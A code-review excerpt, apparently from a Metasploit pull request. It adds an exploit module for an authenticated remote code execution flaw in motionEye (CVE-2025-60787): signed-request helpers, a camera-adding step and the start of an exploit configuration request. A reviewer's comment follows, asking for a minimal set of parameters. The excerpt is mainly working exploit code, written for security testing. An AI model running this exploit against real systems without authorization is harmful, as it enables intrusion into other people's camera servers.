modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb

```diff
@@ -0,0 +1,404 @@
+        body = URI.encode_www_form(opts['vars_post'])
+      end
+    end
+
+    vars_get = {
+      '_username' => datastore['USERNAME'],
+      '_' => generate_timestamp_ms
+    }.merge!(opts.fetch('vars_get', {}))
+
+    query_string = URI.encode_www_form(vars_get)
+
+    path_with_query = query_string.empty? ? base_path : "#{base_path}?#{query_string}"
+
+    signature = compute_signature(
+      method,
+      path_with_query,
+      body,
+      signature_key
+    )
+
+    new_opts = opts.dup
+    new_opts['vars_get'] = vars_get
+    new_opts['vars_get']['_signature'] = signature
+
+    return send_request_cgi(new_opts)
+  end
+
+  def add_camera
+    print_status('Adding camera...')
+
+    res = send_signed_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/config/add/'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        'scheme' => 'rtsp',
+        'host' => '127.0.0.1',
+        'port' => '',
+        'path' => '/',
+        'username' => '',
+        'password' => '',
+        'proto' => 'netcam',
+        'camera_index' => 'tcp'
+      }.to_json
+    )
+
+    begin
+      json_body = JSON.parse(res.body)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Unable to parse the response')
+    end
+
+    unless json_body.key?('id')
+      fail_with(Failure::UnexpectedReply, "#{peer} - Camera ID not found in response")
+    end
+
+    print_good('Camera successfully added')
+
+    return json_body['id']
+  end
+
+  def set_exploit(camera_id)
+    print_status('Setting up exploit...')
+
+    res = send_signed_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/config/0/set/'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        camera_id => {
+          'enabled' => true,
+          'name' => 'Camera1',
+          'proto' => 'netcam',
+          'auto_brightness' => false,
+          'rotation' => '0',
+          'framerate' => '2',
+          'privacy_mask' => false,
+          'privacy_mask_lines' => [],
+          'extra_options' => [],
+          'storage_device' => 'custom-path',
+          'network_server' => '',
+          'network_share_name' => '',
+          'network_smb_ver' => '1.0',
+          'network_username' => '',
+          'network_password' => '',
+          'root_directory' => '/var/lib/motioneye/Camera1',
+          'upload_enabled' => false,
+          'upload_picture' => true,
+          'upload_movie' => true,
+          'upload_service' => 'ftp',
+          'upload_server' => '',
+          'upload_port' => '',
+          'upload_method' => 'post',
+          'upload_location' => '',
+          'upload_subfolders' => true,
+          'upload_username' => '',
+          'upload_password' => '',
+          'upload_authorization_key' => '',
+          'upload_endpoint_url' => '',
+          'upload_access_key' => '',
+          'upload_secret_key' => '',
+          'upload_bucket' => '',
```

Comment:
There are a lot of parameters here. Have you verified if you can simplify this down to just the bare essential of what is needed? You may only need to send a few parameters vs all of these to get the exploit to work. Additionally some of these parameters that are blank may not be needed.

As a general principal we try to send the smallest payload needed to trigger the vulnerability.